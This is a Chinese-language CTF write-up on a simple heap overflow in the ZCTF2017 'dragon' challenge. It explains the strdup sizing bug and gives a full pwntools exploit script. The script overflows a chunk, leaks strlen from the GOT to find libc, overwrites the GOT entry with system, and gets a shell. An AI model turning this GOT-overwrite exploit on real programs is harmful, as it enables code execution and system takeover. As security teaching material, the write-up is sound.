堆利用小结

堆利用小结

关于堆的利用原理比较复杂，今天就只分析一个最简单的堆溢出，后面关于UAF，double free，unlink等的一些相关东西，我抽个集中的时间再总结写出来。这里就用一道ZCTF2017 dragon的一道堆溢出的题来分析：

这是一个64位的程序，开启了cannary 和PIE。

接下来我们找洞：

 可以看到，在add函数的strdup函数处创建堆的时候出现了漏洞。导致在edit写入的数据的时候，可以写入的数据量大于strdup创建的堆，导致堆溢出，然后就可以覆写下一个堆的内容，进而leak地址和修改got。原理如下图：

 

脚本如下：

from pwn import *
 
debug = 1 
#r = remote('58.213.63.30', 11501) 
r = process("./dragon")
context.log_level = 'debug'
   
def add(size, name, content):
    r.recvuntil('>> ')
    r.sendline('1')
    r.recvuntil(':')
    r.sendline(str(size))
    r.recvuntil(':')
    r.sendline(name)
    r.recvuntil(':')
    r.sendline(content)
    
def edit(id, content):
    r.recvuntil('>> ')
    r.sendline('2')
    r.recvuntil(':')
    r.sendline(str(id))
    r.recvuntil(':')
    r.write(content)
    
def show(id):
    r.recvuntil('>> ')
    r.sendline('4')
    r.recvuntil(':')
    r.sendline(str(id))
    
def delete(id):
    r.recvuntil('>> ')
    r.sendline('3')
    r.recvuntil(':')
    r.sendline(str(id))
      
add(0x20, 'AAAA', 'AAAA')
add(0x20, 'BBBB', 'B'*0x18)
add(0x20, 'CCCC', 'C'*0x18)

edit(0, 'A'*0x18+p64(0xd1)) 

delete(1)

add(0x20, 'DDDD', 'D'*0x18)

strlen_got = 0x602028

add(0x10, 'EEEE', p64(strlen_got)+'E'*0x10)
edit(3, p64(strlen_got)) 

show(2)
r.recvuntil('content: ')
strlen_addr = u64(r.readline()[:-1].ljust(8, 'x00'))
print "[*] strlen addr:{0}".format(hex(strlen_addr))
#libc = ELF("./libc-2.19.so")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc_base = strlen_addr - libc.symbols['strlen']
system_addr = libc_base + libc.symbols['system'] 
#gdb.attach(r,open('bb')) 
print"system_addr",hex(system_addr)
edit(2, p64(system_addr))
    
edit(0, '/bin/shx00')
r.interactive()

 现在我们来对这道题仔细的研究下：

首先申请了3组堆，每add一个对象会创建三个堆，分别为空堆 + name + content。

 

 然后拓展堆，并且释放到 Unsortbins：

 

 然后构造两组堆！DDD和EEE。

 

可以看到 0xdb9100处，也就是我们把strlen@got的地址写入了，EEEE堆的内容（content）处：

 

这样我们在list(2)的时候，就可以leak出strlen的地址了，进而获取libc的基地址，获取system的地址，写入system地址，再传入参数。

 这里有一个坑啊，通过read函数，改写strlen@got，因为read的指针指向EEEE的content，直接写入数据就行了。

然后就是调动system("/bin/sh")喽！